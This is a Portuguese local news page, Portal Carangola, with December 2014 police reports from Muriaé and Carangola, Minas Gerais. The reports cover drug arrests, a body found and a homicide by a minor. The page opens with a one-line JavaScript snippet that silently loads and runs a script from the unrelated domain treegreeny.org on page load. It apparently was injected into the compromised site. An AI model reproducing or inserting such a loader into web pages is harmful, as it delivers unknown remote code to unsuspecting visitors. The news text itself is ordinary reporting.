;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais Carangola e Região 08/12/14. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais Carangola e Região 08/12/14.

pmOCORRÊNCIAS DE DESTAQUE MURIAÉ – 08/12/2014
76ª CIA PM – MURIAÉ-MG
PM EFETUA PRISÃO DE AUTORES E APREENSÃO DE MENORES POR TRÁFICO DE DROGAS E POSSE DE ARMAS EM MURIAÉ

Em 05/12/2014, por volta das 17h30min, na Rua Luther King, no Bairro São Cristóvão, equipe de militares, na posse de informações, deslocaram para o local e lograram êxito em abordar os seguintes autores: R.A.B., de 35 anos; M.T.C.O., de 16 anos; W.G.R., de 20 anos; A.S.G., de 15 anos e V.M.S., de 33 anos, todos eles no interior da residência. Foram recolhidos os materiais: 02 revólveres da marca TAURUS, Cal. 38, 12 munições intactas Cal .38; 91 papelotes de cocaína; 01 pedra grande de crack; R$ 342,00; 05 celulares da marca LG e diversos materiais relacionados com a mercância de drogas. Autores e materiais foram conduzidos para à DPJ.

PM FOI ACIONADA EM OCORRÊNCIA EM QUE FOI ENCONTRADO CADÁVER DE MORADOR DE EUGENÓPOLIS

Em 05/12/2014, por volta das 06h45min, na Rua Celso freitas, no bairro Nossa Senhora de Fátima, militares compareceram ao local onde o solicitante M.S.F., de 37 anos, relatou que ao visitar seu irmão, M.S., de 35 anos, verificou que o mesmo já estava sem os sinais vitais, bem frio e enrijecido. O local foi isolado e acionada a perícia técnica, que não constatou nenhuma lesão nem sinais de violência. Informou ainda o solicitante que no dia anterior a vítima sofreu uma queda no rio LAMBARI, sendo socorrido ao HSP em MURIAÉ, onde permaneceu internado das 14:00h as 17:40h, sendo então liberado. Informou ainda que a vítima fazia uso demasiado de bebidas alcoólicas bem como de medicamentos controlados.

PM EFETUA APREENSÃO DE MENOR POR HOMCÍDIO EM MURIAÉ

Em 06/12/2014, por volta das 21h30min, na Rua Bicas, no Bairro Santa Terezinha, militares compareceram em frente ao Centro Social Urbano, onde D.A.S., de 18 anos, havia sido vítima de disparos de arma de fogo, sendo socorrido ao HSP, onde veio a óbito devido a cinco perfurações nas costas. Que o autor seria o contumaz M.P.S.”C.”, de 17 anos, o qual não foi localizado. A perícia recolheu no local um projétil de arma de fogo. Em continuidade ao rastreamento, o autor foi localizado pela rua JUIZ DE FORA, sendo apreendido e conduzido à DPJ.
75ª CIA PM – CARANGOLA-MG
PM EFETUA PRISÃO DE JOVEM POR TRÁFICO DE DROGAS, APÓS DENÚNCIA DE SUA MÃE, E PRENDE MAIS DOIS AUTORES ENVOLVIDOS COM O TRÁFICO EM DIVINO

Em 05/12/2014, por volta das 17h30min, na Rua João Ferreira Rocha, no Givisiez, E.S., de 47 anos, informou aos militares que ficou sabendo que sua filha C.S.B., de 18 anos, estava vendendo drogas e que havia encontrado dentro do guarda-roupa da filha uma bolsa cor cinza, contendo sete buchas de uma substância semelhante a maconha. Em contato com ela, a mesma relatou que adquiriu dez buchas de maconha do indivíduo conhecido como “M.” e estava vendendo pelo valor de R$ 5,00. Diante do exposto, a droga foi apreendida, e a autora presa e conduzida para DPJ.

Na mesma data, por volta das 19h40min, na Rua Guthemberg Souza Filho, no mesmo bairro, militares, durante patrulhamento, abordaram os acusados A.S., de 35 anos, e N.T.A., de 22 anos, onde encontraram no bolso da bermuda do primeiro uma sacola plástica com duas buchas de maconha. Este informou que adquiriu a droga do segundo elemento, o qual confirmou os fatos perante as testemunhas arroladas. A droga foi apreendida, os autores presos e conduzidos para DPJ.
ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM
RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA
MURIAÉ / MG
TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.